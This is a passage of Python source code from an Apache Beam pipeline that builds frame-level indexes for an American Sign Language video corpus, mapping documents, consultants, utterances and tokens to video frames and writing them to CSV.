# print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} document_asl_consultant__to__target_video_utterance_token_map_tpl utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} frames dir ({target_video_frames_dir}) does not exist!")
_token_end_frame = _token_start_frame = -1
frame_seq_paths = []
if _n_existing_frame_images > 0:
_token_start_frame = int(round(_token_start_time/1000.0*fidscs_globals.FPS))
_token_end_frame = int(round(_token_end_time/1000.0*fidscs_globals.FPS))+1
n_frames = _token_end_frame-_token_start_frame
last_frame_idx = (_n_existing_frame_images-1)
if _token_start_frame > last_frame_idx:
# comment out for now
# print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} _token_start_frame ({_token_start_frame}) > _n_existing_frame_images ({_n_existing_frame_images}): reconciling bounds of {n_frames} frames (from last frame index {last_frame_idx}) to {(last_frame_idx-(n_frames-1), last_frame_idx)}")
# return document_asl_consultant__to__target_video_utterance_token_map_tpl
# readjust bounds from last_frame_idx going backwards
_token_start_frame = last_frame_idx-(n_frames-1)
_token_end_frame = last_frame_idx
else:
if _token_end_frame > last_frame_idx:
# print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} _token_end_frame ({_token_end_frame}) > _n_existing_frame_images ({_n_existing_frame_images}): reconciling _token_end_frame to {last_frame_idx}")
# return document_asl_consultant__to__target_video_utterance_token_map_tpl
# take all that is available to the end
_token_end_frame = last_frame_idx
if _token_start_frame <= last_frame_idx and _token_end_frame <= last_frame_idx:
for frame_idx in range(_token_start_frame, _token_end_frame+1):
frame_path = fileio.path_join(target_video_frames_dir, f"{frame_idx}.jpg")
if fileio.file_path_exists(frame_path)[0]:
frame_seq_paths.append(frame_path)
else:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname}: failed to reconcile invalid requested frame bounds {(_token_start_frame, _token_end_frame)} (valid bounds are: {(0, last_frame_idx)})")
# return document_asl_consultant__to__target_video_utterance_token_map_tpl
else:
if fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] target_video_fname {_target_video_fname} _token_end_frame ({_token_end_frame}) > _n_existing_frame_images ({_n_existing_frame_images}): reconciling _token_end_frame to {last_frame_idx}")
_camera_perspective = target_video_map_instance[1]
if _camera_perspective is None or not isinstance(_camera_perspective, int) or _camera_perspective<0:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} utterance_token_map[{i}] target_video_map_instance[{j}] camera_perspective is invalid: {_camera_perspective}")
return document_asl_consultant__to__target_video_utterance_token_map_tpl
validated_results.append(
(
corpus_doc_id,
asl_consultant_id,
_target_video_fname,
_camera_perspective,
_utterance_seq_id,
_token_seq_id,
_token_id,
_token_start_time,
_token_end_time,
_token_start_frame,
_token_end_frame,
frame_seq_paths,
_n_existing_frame_images
)
)
return validated_results
def pl__8__create_document_asl_consultant_utterance_token_frame_index_schemad_pcoll(
document_asl_consultant_utterance_token_index_schemad_pcoll,
document_asl_consultant_target_video_index_schemad_pcoll,
document_asl_consultant_target_video_frame_index_schemad_pcoll,
d_pl_options
):
"""
document_asl_consultant_utterance_token_index_schemad_pcoll:
beam.Row(
DocumentID=document_asl_consultant_utterance_token_tpl[0],
DocumentFilename=document_asl_consultant_utterance_token_tpl[1],
ASLConsultantID=document_asl_consultant_utterance_token_tpl[2],
ParticipantName=document_asl_consultant_utterance_token_tpl[3],
UtteranceSequence=document_asl_consultant_utterance_token_tpl[4],
TokenSequence=document_asl_consultant_utterance_token_tpl[7],
StartTime=document_asl_consultant_utterance_token_tpl[8],
EndTime=document_asl_consultant_utterance_token_tpl[9],
TokenID=document_asl_consultant_utterance_token_tpl[5],
Field='', # blank for now
FieldValue='' # blank for now
)
document_asl_consultant_target_video_index_schemad_pcoll:
beam.Row(
# SCHEMA_COL_NAMES__VIDEO_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'CameraPerspective',
# 'TargetVideoFilename'
# ]
DocumentID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][0]),
DocumentFileName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][0]),
ASLConsultantID=int(document_asl_consultant_video_index_pcoll_row_tpl[0][1]),
ParticipantName=str(document_asl_consultant_video_index_pcoll_row_tpl[1][1]),
UtteranceSequence=int(document_asl_consultant_video_index_pcoll_row_tpl[1][2]),
CameraPerspective=int(document_asl_consultant_video_index_pcoll_row_tpl[1][4]),
TargetVideoFilename=str(document_asl_consultant_video_index_pcoll_row_tpl[1][3])
)
document_asl_consultant_target_video_frame_index_schemad_pcoll
beam.Row(
DocumentID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][0]),
ASLConsultantID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][1]),
CameraPerspective=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][2]),
TargetVideoFilename=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][0]),
FrameSequence=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][1]),
FramePath=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][2]),
UtteranceSequence
)
return schemad pcoll using:
SCHEMA_COL_NAMES__UTTERANCE_TOKEN_FRAME_DS = [
'DocumentID',
'ASLConsultantID',
'CameraPerspective',
'TargetVideoFilename',
'UtteranceSequence',
'TokenSequence',
'FrameSequence',
'TokenID'
]
"""
doc_consultant_utterance__to__target_video_map = (
document_asl_consultant_target_video_index_schemad_pcoll
| "Beam PL: extract ((<doc id>, <asl consultant id>, <utterance seq id>), (<target vid fname>, <camera perspective>))" >> beam.Map(
lambda document_asl_consultant_target_video_index_schemad_pcoll_row: (
(
document_asl_consultant_target_video_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_target_video_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_target_video_index_schemad_pcoll_row.UtteranceSequence
),
(
document_asl_consultant_target_video_index_schemad_pcoll_row.TargetVideoFilename,
document_asl_consultant_target_video_index_schemad_pcoll_row.CameraPerspective
)
)
)
| "Beam PL: select distinct ((<doc id>, <asl consultant id>, <utterance seq id>), (<target vid fname>, <camera perspective>))" >> beam.Distinct()
)
doc_consultant_utterance__to__token_map = (
document_asl_consultant_utterance_token_index_schemad_pcoll
| "Beam PL: extract ((<doc id>, <asl consultant id>, <utterance seq id>), (<tok vocab id>, <tok seq id>, <tok start time>, <tok end time>, listof(<frame seq id>))) from document_asl_consultant_utterance_token_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_utterance_token_index_schemad_pcoll_row: (
(
document_asl_consultant_utterance_token_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.UtteranceSequence
),
(
document_asl_consultant_utterance_token_index_schemad_pcoll_row.TokenID,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.TokenSequence,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.StartTime,
document_asl_consultant_utterance_token_index_schemad_pcoll_row.EndTime,
[frame_seq_id for frame_seq_id in range(
int(round(document_asl_consultant_utterance_token_index_schemad_pcoll_row.StartTime/1000.0*fidscs_globals.FPS)), # float(float(document_asl_consultant_utterance_token_index_schemad_pcoll_row.StartTime)/1000.0)*fidscs_globals.FPS
int(round(document_asl_consultant_utterance_token_index_schemad_pcoll_row.EndTime/1000.0*fidscs_globals.FPS)) # float(float(document_asl_consultant_utterance_token_index_schemad_pcoll_row.EndTime)/1000.0)*fidscs_globals.FPS
)
]
)
)
)
# debug
# | "Beam PL: print doc_consultant__to__utterance_token_map" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant__to__utterance_token_map entry"))
)
doc_consultant_utterance__to__target_video_token_map = (
({
'target_video_map': doc_consultant_utterance__to__target_video_map,
'token_map': doc_consultant_utterance__to__token_map
})
| "Beam PL: merge target_video_map and token_map" >> beam.CoGroupByKey()
# the above produces tuples of the form:
# (
# (<doc id>, <asl consultant id>, <utterance seq id>), # key
# {
# 'target_video_map': [(<target vid fname>, <camera perspective>)], # up to three, corresponding to camera perspective
# 'token_map': [(<tok vocab id>, <tok seq id>, <tok start time>, <tok end time>, listof(<frame seq id>))] # there will be many, corresponding to token sequence id for this utterance
# }
# )
| "Beam PL: sort doc_consultant_utterance__to__target_video_token_map token_map based on <tok seq id>" >> beam.Map(
lambda doc_consultant_utterance__to__target_video_token_map_tpl: (
(
doc_consultant_utterance__to__target_video_token_map_tpl[0][0], # <doc id>
doc_consultant_utterance__to__target_video_token_map_tpl[0][1], # <asl consultant id>
doc_consultant_utterance__to__target_video_token_map_tpl[0][2] # <utterance seq id>
),
{
'target_video_map': sorted(
doc_consultant_utterance__to__target_video_token_map_tpl[1]['target_video_map'],
key=lambda target_vid_info_tpl: target_vid_info_tpl[1] # <camera perspective>
),
'token_map': sorted(
doc_consultant_utterance__to__target_video_token_map_tpl[1]['token_map'],
key=lambda tok_info_tpl: tok_info_tpl[1] # <tok seq id>
)
}
)
)
# debug
# | "Beam PL: print doc_consultant_utterance__to__target_video_token_map" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_utterance__to__target_video_token_map entry"))
)
doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_MAX_CAMERA_PERSPECTIVES = (
doc_consultant_utterance__to__target_video_token_map
| f"filter doc_consultant_utterance__to__target_video_token_map_tpls with len(target_video_map)<={fidscs_globals.MAX_CAMERA_PERSPECTIVES}" >> beam.Filter(
lambda doc_consultant_utterance__to__target_video_token_map_tpl: len(doc_consultant_utterance__to__target_video_token_map_tpl[1]['target_video_map'])<=fidscs_globals.MAX_CAMERA_PERSPECTIVES
)
# debug
# | "Beam PL: print doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_3" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_3 entry"))
)
# debug
# we have a problem if doc_consultant_utterance__to__target_video_token_map__target_video_map_gt_MAX_CAMERA_PERSPECTIVES is non-empty!
doc_consultant_utterance__to__target_video_token_map__target_video_map_gt_MAX_CAMERA_PERSPECTIVES = (
doc_consultant_utterance__to__target_video_token_map
| f"filter doc_consultant_utterance__to__target_video_token_map_tpls with len(target_video_map)>{fidscs_globals.MAX_CAMERA_PERSPECTIVES}" >> beam.Filter(
lambda doc_consultant_utterance__to__target_video_token_map_tpl: len(doc_consultant_utterance__to__target_video_token_map_tpl[1]['target_video_map'])>fidscs_globals.MAX_CAMERA_PERSPECTIVES
)
# debug
# | "Beam PL: print doc_consultant_utterance__to__target_video_token_map__target_video_map_gt_MAX_CAMERA_PERSPECTIVES" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg=f"{fidscs_globals.VALIDATION_WARNING_TEXT} len(target_video_map)>{fidscs_globals.MAX_CAMERA_PERSPECTIVES} entry"))
)
# now transform doc_consultant_utterance__to__target_video_token_map tuples
# from:
# (
# (<doc id>, <asl consultant id>, <utterance seq id>), # key
# {
# 'target_video_map': [(<target vid fname>, <camera perspective>)], # up to three, corresponding to camera perspective
# 'token_map': [(<tok vocab id>, <tok seq id>, <tok start time>, <tok end time>, listof(<frame seq id>))] # there will be many, corresponding to token sequence id for this utterance
# }
# )
# to:
# (
# (<doc id>, <asl consultant id>, <utterance seq id>, <tok seq id>), # key
# (
# <tok vocab id>,
# <tok start time>,
# <tok end time>,
# listof(<frame seq id>),
# listof((<target vid fname>, <camera perspective>))
# )
# )
document_asl_consultant_utterance_token_frame_index_tpl_pcoll = (
doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_MAX_CAMERA_PERSPECTIVES
| "Beam PL: transform doc_consultant_utterance__to__target_video_token_map__target_video_map_lte_MAX_CAMERA_PERSPECTIVES" >> beam.Map(
lambda doc_consultant_utterance__to__target_video_token_map_tpl: [
(
(
doc_consultant_utterance__to__target_video_token_map_tpl[0][0], # <doc id>
doc_consultant_utterance__to__target_video_token_map_tpl[0][1], # <asl consultant id>
doc_consultant_utterance__to__target_video_token_map_tpl[0][2], # <utterance seq id>
token_info_tpl[1] # <tok seq id>
),
(
token_info_tpl[0], # <tok vocab id>
token_info_tpl[2], # <tok start time>
token_info_tpl[3], # <tok end time>
token_info_tpl[4], # listof(<frame seq id>)
doc_consultant_utterance__to__target_video_token_map_tpl[1]['target_video_map'], # listof((<target vid fname>, <camera perspective>))
)
) for token_info_tpl in doc_consultant_utterance__to__target_video_token_map_tpl[1]['token_map']
]
)
| "Beam PL: 'explode' list of doc_consultant_utterance__to__target_video_token_map_tpl" >> beam.FlatMap(
lambda list_doc_consultant_utterance__to__target_video_token_map_tpl: list_doc_consultant_utterance__to__target_video_token_map_tpl
)
# debug
# | "Beam PL: print document_asl_consultant_utterance_token_frame_index_tpl_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_utterance_token_frame_index_tpl_pcoll entry"))
)
document_asl_consultant_utterance_token_frame_index_tpl_pcoll = beam__common.pl__X__sort_pcoll(
document_asl_consultant_utterance_token_frame_index_tpl_pcoll,
pcoll_label="document_asl_consultant_utterance_token_frame_index_tpl_pcoll"
)
doc_consultant_target_video_frame__to__utterance_token_map = (
document_asl_consultant_utterance_token_frame_index_tpl_pcoll
| "Beam PL: 'explode' to list of ((<doc id>,<asl consultant id>,<camera perspective>,<target vid fname>,<utterance seq id>,<tok seq id>)),(listof(<frame seq id>),<tok vocab id>)) from document_asl_consultant_utterance_token_frame_index_tpl_pcoll" >> beam.Map(
lambda document_asl_consultant_utterance_token_frame_index_tpl: [
(
(
document_asl_consultant_utterance_token_frame_index_tpl[0][0], # <doc id>
document_asl_consultant_utterance_token_frame_index_tpl[0][1], # <asl consultant id>
target_vid_cam_persp[1], # <camera perspective>
target_vid_cam_persp[0], # <target vid fname>
document_asl_consultant_utterance_token_frame_index_tpl[0][2], # <utterance seq id>
document_asl_consultant_utterance_token_frame_index_tpl[0][3] # <tok seq id>
),
(
document_asl_consultant_utterance_token_frame_index_tpl[1][3], # listof(<frame seq id>)
document_asl_consultant_utterance_token_frame_index_tpl[1][0] # <tok vocab id>
)
# ) for target_vid_frame_seq_tpl in zip(document_asl_consultant_utterance_token_frame_index_tpl[1][4], document_asl_consultant_utterance_token_frame_index_tpl[1][3])
) for target_vid_cam_persp in document_asl_consultant_utterance_token_frame_index_tpl[1][4] # listof((<target vid fname>, <camera perspective>))
]
)
| "Beam PL: 'explode' list of ((<doc id>,<asl consultant id>,<camera perspective>,<target vid fname>,<utterance seq id>,<tok seq id>)),(listof(<frame seq id>),<tok vocab id>)) tuples" >> beam.FlatMap(
lambda list_doc_consultant_target_video_utterance_token__to__list_of_frame_seq_map_tpl: list_doc_consultant_target_video_utterance_token__to__list_of_frame_seq_map_tpl
)
| "Beam PL: 'explode' to list of (<doc id>,<asl consultant id>,<camera perspective>,<target vid fname>,<utterance seq id>,<tok seq id>,<frame seq id>,<tok vocab id>) from list_doc_consultant_target_video_utterance_token__to__list_of_frame_seq_map_tpl" >> beam.Map(
lambda tpl: [
(
(
tpl[0][0], # <doc id>
tpl[0][1], # <asl consultant id>
tpl[0][2], # <camera perspective>
tpl[0][3], # <target vid fname>
frame_seq_id # <frame seq id>
),
(
tpl[0][4], # <utterance seq id>
tpl[0][5], # <tok seq id>
tpl[1][1] # <tok vocab id>
)
) for frame_seq_id in tpl[1][0]
]
)
| "Beam PL: 'explode' list of tuples" >> beam.FlatMap(lambda list_tpl: list_tpl)
# debug
# | "Beam PL: print doc_consultant_target_video_frame__to__utterance_token_map" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_target_video_frame__to__utterance_token_map entry"))
)
# document_asl_consultant_target_video_frame_index_schemad_pcoll
# beam.Row(
# DocumentID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][0]),
# ASLConsultantID=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][1]),
# CameraPerspective=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[0][2]),
# TargetVideoFilename=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][0]),
# FrameSequence=int(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][1]),
# FramePath=str(sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][2])
# # , JPEGBytes=sorted_document_asl_consultant_target_video_frame_index_pcoll_row_tpl[1][3]
# )
existing_target_video_frames_pcoll = (
document_asl_consultant_target_video_frame_index_schemad_pcoll
| "Beam PL: extract ((<doc id>, <asl consultant id>, <camera perspective>, <target vid fname>, <frame seq id>), '<TARGET VIDEO FRAME EXISTS>') from document_asl_consultant_target_video_frame_index_schemad_pcoll" >> beam.Map(
lambda document_asl_consultant_target_video_frame_index_schemad_pcoll_row: (
(
document_asl_consultant_target_video_frame_index_schemad_pcoll_row.DocumentID,
document_asl_consultant_target_video_frame_index_schemad_pcoll_row.ASLConsultantID,
document_asl_consultant_target_video_frame_index_schemad_pcoll_row.CameraPerspective,
document_asl_consultant_target_video_frame_index_schemad_pcoll_row.TargetVideoFilename,
document_asl_consultant_target_video_frame_index_schemad_pcoll_row.FrameSequence
),
'<TARGET VIDEO FRAME EXISTS>'
)
)
# debug
# | "Beam PL: print existing_target_video_frames_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="existing_target_video_frames_pcoll entry"))
)
doc_consultant_target_video_frame__to__target_video_token_map = (
({
'target_video_frame_exists': existing_target_video_frames_pcoll,
'existing_utterance_token_map': doc_consultant_target_video_frame__to__utterance_token_map
})
| "Beam PL: merge existing_target_video_frames_map and utterance_token_map" >> beam.CoGroupByKey()
# the above produces tuples of the form:
# (
# (<doc id>, <asl consultant id>, <camera perspective>, <target vid fname>, <frame seq id>), # key
# {
# 'target_video_frame_exists': ['<TARGET VIDEO FRAME EXISTS>'] | [], # if empty, then the frame does not exist in document_asl_consultant_target_video_frame_index_schemad_pcoll
# 'utterance_token_map': [(<utterance seq id>, <tok seq id>, <tok vocab id>)]
# }
# )
# debug
# | "Beam PL: print doc_consultant_target_video_frame__to__target_video_token_map" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_target_video_frame__to__target_video_token_map entry"))
)
doc_consultant_target_video_frame__to__target_video_token_map__non_existing_frame = (
doc_consultant_target_video_frame__to__target_video_token_map
| "Beam PL: filter non-existing frames (in document_asl_consultant_target_video_frame_index_schemad_pcoll)" >> beam.Filter(
lambda doc_consultant_target_video_frame__to__target_video_token_map_tpl: len(doc_consultant_target_video_frame__to__target_video_token_map_tpl[1]['target_video_frame_exists'])==0
)
)
doc_consultant_target_video_frame__to__target_video_token_map__existing_frame = (
doc_consultant_target_video_frame__to__target_video_token_map
| "Beam PL: filter existing frames (in document_asl_consultant_target_video_frame_index_schemad_pcoll)" >> beam.Filter(
lambda doc_consultant_target_video_frame__to__target_video_token_map_tpl: len(doc_consultant_target_video_frame__to__target_video_token_map_tpl[1]['target_video_frame_exists'])>0
)
# debug
# | "Beam PL: print doc_consultant_target_video_frame__to__target_video_token_map__existing_frame" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="doc_consultant_target_video_frame__to__target_video_token_map__existing_frame entry"))
)
doc_consultant_target_video_frame__to__target_video_token_map__existing_frame__non_existing_utterance_token = (
doc_consultant_target_video_frame__to__target_video_token_map__existing_frame
| "Beam PL: filter non-existing record keys (in doc_consultant_target_video_frame__to__utterance_token_map)" >> beam.Filter(
lambda doc_consultant_target_video_frame__to__target_video_token_map__existing_frame_tpl: len(doc_consultant_target_video_frame__to__target_video_token_map__existing_frame_tpl[1]['existing_utterance_token_map'])==0
)
)
document_asl_consultant_target_video_utterance_token_frame_index_pcoll = (
doc_consultant_target_video_frame__to__target_video_token_map__existing_frame
| "Beam PL: filter existing record keys (in doc_consultant_target_video_frame__to__utterance_token_map)" >> beam.Filter(
lambda doc_consultant_target_video_frame__to__target_video_token_map__existing_frame_tpl: len(doc_consultant_target_video_frame__to__target_video_token_map__existing_frame_tpl[1]['existing_utterance_token_map'])>0
)
| "Beam PL: extract ((<doc id>, <asl consultant id>, <camera perspective>, <target vid fname>, <utterance seq id>, <token seq id>), (<token vocab id>, <frame seq id>)) from doc_consultant_target_video_frame__to__target_video_token_map" >> beam.Map(
# (
# (<doc id>, <asl consultant id>, <camera perspective>, <target vid fname>, <frame seq id>), # key
# {
# 'target_video_frame_exists': ['<TARGET VIDEO FRAME EXISTS>'] | [], # if empty, then the frame does not exist in document_asl_consultant_target_video_frame_index_schemad_pcoll
# 'utterance_token_map': [(<utterance seq id>, <tok seq id>, <tok vocab id>)]
# }
# )
lambda doc_consultant_target_video_frame__to__target_video_token_map_tpl: [
(
(
doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][0], # <doc id>
doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][1], # <asl consultant id>
doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][2], # <camera perspective>
doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][3], # <target vid fname>
utterance_token_tpl[0], # <utterance seq id>
utterance_token_tpl[1], # <token seq id>
doc_consultant_target_video_frame__to__target_video_token_map_tpl[0][4], # <frame seq id>
), # key
utterance_token_tpl[2] # <tok vocab id>
) for utterance_token_tpl in doc_consultant_target_video_frame__to__target_video_token_map_tpl[1]['existing_utterance_token_map']
]
)
| "Beam PL: 'explode' list of document_asl_consultant_target_video_utterance_token_frame_index tuples" >> beam.FlatMap(
lambda list_document_asl_consultant_target_video_utterance_token_frame_index_tpl: list_document_asl_consultant_target_video_utterance_token_frame_index_tpl
)
# debug
# | "Beam PL: print document_asl_consultant_target_video_utterance_token_frame_index_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_target_video_utterance_token_frame_index_pcoll entry"))
)
sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll = beam__common.pl__X__sort_pcoll(
document_asl_consultant_target_video_utterance_token_frame_index_pcoll,
pcoll_label="document_asl_consultant_target_video_utterance_token_frame_index_pcoll"
)
document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll = (
sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll
| "Beam PL: apply schema to create final document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll" >> beam.Map(
lambda sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll: beam.Row(
# SCHEMA_COL_NAMES__UTTERANCE_TOKEN_FRAME_DS = [
# 'DocumentID',
# 'ASLConsultantID',
# 'CameraPerspective',
# 'TargetVideoFilename',
# 'UtteranceSequence',
# 'TokenSequence',
# 'FrameSequence',
# 'TokenID'
# ]
DocumentID=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][0]),
ASLConsultantID=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][1]),
CameraPerspective=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][2]),
TargetVideoFilename=str(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][3]),
UtteranceSequence=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][4]),
TokenSequence=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][5]),
FrameSequence=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[0][6]),
TokenID=int(sorted_document_asl_consultant_target_video_utterance_token_frame_index_pcoll[1])
)
)
# debug
# | "Beam PL: print document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll entry"))
)
return document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll
def pl__9__write_document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll(document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll, d_pl_options):
document_asl_consultant_target_video_utterance_token_frame_index_csv_rows = (
document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll
| beam.Map(lambda document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll_row: beam__common.beam_row_to_csv_string(document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll_row))
)
return beam__common.pl__X__write_pcoll_to_csv(
document_asl_consultant_target_video_utterance_token_frame_index_csv_rows,
"DOCUMENT-ASLCONSULTANT-TARGETVIDEO-UTTERANCE-TOKEN-FRAME-INDEX",
fidscs_globals.UTTERANCE_TOKEN_FRAME_DS_FNAME,
fidscs_globals.SCHEMA_COL_NAMES__UTTERANCE_TOKEN_FRAME_DS,
d_pl_options
) # document_asl_consultant_target_video_utterance_token_frame_index_csv_path
def validate_preprocess_doc_participant_to_utterance_video_cameraperspective_mapping(tvftmdputftvimt):
"""
tvftmdputftvimt (abbreviation for target_video_fname_to_merged_doc_participant_utterance_target_full_target_vid_index_mapping_tpl):
(
<media fname>, # key
{
'target_video_doc_participant_utterance_mapping': [
(
<corpus doc filename>,
<participant_name>,
<utterance seq id>
)
],
'target_full_target_vid_index_mapping': [
beam.Row(
target_video_filename=<target_video_filename>,
video_seq_id=<video_seq_id>,
perspective_cam_id=<perspective_cam_id>,
compressed_mov_url=<compressed_mov_url>,
compressed_mov_url=<compressed_mov_url>,
uncompressed_avi_url=<uncompressed_avi_url>,
uncompressed_avi_mirror_1_url=<uncompressed_avi_mirror_1_url>,
<uncompressed_avi_mirror_2_url>
)
]
}
)
return:
listof(
((<document fname>, <participant name>), (<utterance seq id>, <media fname>, <camera perspective>))
)
"""
target_video_fname = tvftmdputftvimt[0]
target_video_doc_participant_utterance_mapping = tvftmdputftvimt[1]['target_video_doc_participant_utterance_mapping']
target_full_target_vid_index_mapping = tvftmdputftvimt[1]['target_full_target_vid_index_mapping']
validated_results = []
# there should always only be ONE camera perspective per video_fname file
camera_perspective = None
if len(target_full_target_vid_index_mapping) > 0:
not_unique = False
for full_target_vid_index_pcoll_row in target_full_target_vid_index_mapping:
# _camera_perspective = full_target_vid_index_pcoll_row['CameraPerspective']
_camera_perspective = full_target_vid_index_pcoll_row.perspective_cam_id
if camera_perspective is None:
camera_perspective = _camera_perspective
else:
if _camera_perspective != camera_perspective:
not_unique = True
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} camera perspective not unique! It has camera perspectives: {camera_perspective} and {_camera_perspective}")
break
else:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} has no associated camera perspective!")
doc_fname = None
participant_name = None
utterance_seq_id = None
if len(target_video_doc_participant_utterance_mapping) > 0:
multiple_docs = []
multiple_participants = []
multiple_utterances = []
for target_video_doc_participant_utterance_mapping_instance in target_video_doc_participant_utterance_mapping:
_doc_fname = target_video_doc_participant_utterance_mapping_instance[0]
_participant_name = target_video_doc_participant_utterance_mapping_instance[1]
_utterance_seq_id = target_video_doc_participant_utterance_mapping_instance[2]
if doc_fname is None or len(doc_fname)==0:
doc_fname = _doc_fname
multiple_docs.append(_doc_fname)
else:
if _doc_fname != doc_fname:
multiple_docs.append(_doc_fname)
if participant_name is None or len(participant_name)==0:
participant_name = _participant_name
multiple_participants.append(_participant_name)
else:
if _participant_name != participant_name:
multiple_participants.append(_participant_name)
if utterance_seq_id is None or not isinstance(_utterance_seq_id, int) or _utterance_seq_id<0:
utterance_seq_id = _utterance_seq_id
multiple_utterances.append(_utterance_seq_id)
else:
if _utterance_seq_id != utterance_seq_id:
multiple_utterances.append(_utterance_seq_id)
validated_results.append(
(
(_doc_fname, _participant_name),
(_utterance_seq_id, target_video_fname, camera_perspective)
)
)
multiple_docs = set(multiple_docs)
if len(multiple_docs) > 1 and fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} target video {target_video_fname} document occurrence is not unique! It occurs in documents: {multiple_docs}")
multiple_participants = set(multiple_participants)
if len(multiple_participants) > 1 and fidscs_globals.OUTPUT_INFO_LEVEL <= fidscs_globals.OUTPUT_INFO_LEVEL__WARNING:
print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} target video {target_video_fname} participant occurrence is not unique! It has participants: {multiple_participants}")
# if len(multiple_utterances) > 1: # this is actually expected
# print(f"{fidscs_globals.VALIDATION_WARNING_TEXT} target video {target_video_fname} utterance seq id occurrence is not unique! It has utterance seq ids: {multiple_utterances}")
else:
print(f"{fidscs_globals.VALIDATION_FATAL_ERROR_TEXT} target video {target_video_fname} is not associated with a corpus document!")
validated_results.append(
(None, participant_name),
(utterance_seq_id, target_video_fname, camera_perspective)
)
return validated_results
def validate_preprocess_video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl(vdpucpwiprt):
"""
vdpucpwiprt (video_doc_participant_utterance_camera_perspective_with_ids_pcoll_row_tpl):
(
(<doc filename>, <participant name>), # key
{
'document_participant_with_ids_mapping': [
(<doc id>, <asl consultant id>)
],
'doc_participant_to_utterance_video_cameraperspective_mapping': [
(<utterance seq id>, <video fname>, <camera perspective>)
]
}
)
return:
listof(
((<doc id>, <asl consultant id>), (<doc filename>, <participant name>, <utterance seq id>, <media filename>, <camera perspective>))
)
"""
doc_fname = vdpucpwiprt[0][0]
